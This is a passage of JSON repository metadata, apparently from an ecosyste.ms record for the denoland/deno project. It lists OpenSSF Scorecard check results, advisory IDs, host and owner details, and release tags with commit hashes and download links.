'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kin